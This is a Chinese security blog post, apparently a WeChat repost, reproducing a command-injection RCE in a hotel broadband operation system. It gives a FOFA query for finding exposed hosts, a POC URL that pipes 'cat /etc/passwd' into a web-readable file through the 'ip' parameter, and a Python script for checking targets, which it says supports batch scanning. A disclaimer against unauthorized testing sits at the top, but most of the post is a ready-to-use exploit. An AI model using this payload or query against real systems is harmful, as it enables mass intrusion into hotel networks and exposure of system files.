漏洞复现-酒店宽带运营系统RCE

  • A+
所属分类:安全文章

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


FOFA语句:

title="酒店宽带运营"


POC:

http://url/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1


脚本代码:

def poc(url):  print("-"*50)  print("开始检测: "+url)  target = url+"/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"  r = requests.get(url=target,timeout=8,verify=False)  if r.status_code ==200 and "parent.doTestResult" in r.text:    print(url+"  漏洞存在!")    print("请访问:"+url+"/Test.txt")    print("-"*50)    print("n")  else:    print(url+"  漏洞不存在!")    print("-"*50)    print("n")


利用截图:

漏洞复现-酒店宽带运营系统RCE

漏洞复现-酒店宽带运营系统RCE

支持批量检测!


利用说明:

检测成功后,若存在漏洞,会向Test.txt文件写入cat /etc/passwd的内容,访问url/Test.txt即可访问到内容!回复:酒店宽带运营系统RCE 即可获取脚本!

本文始发于微信公众号(Fight Tigers Team):漏洞复现-酒店宽带运营系统RCE

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: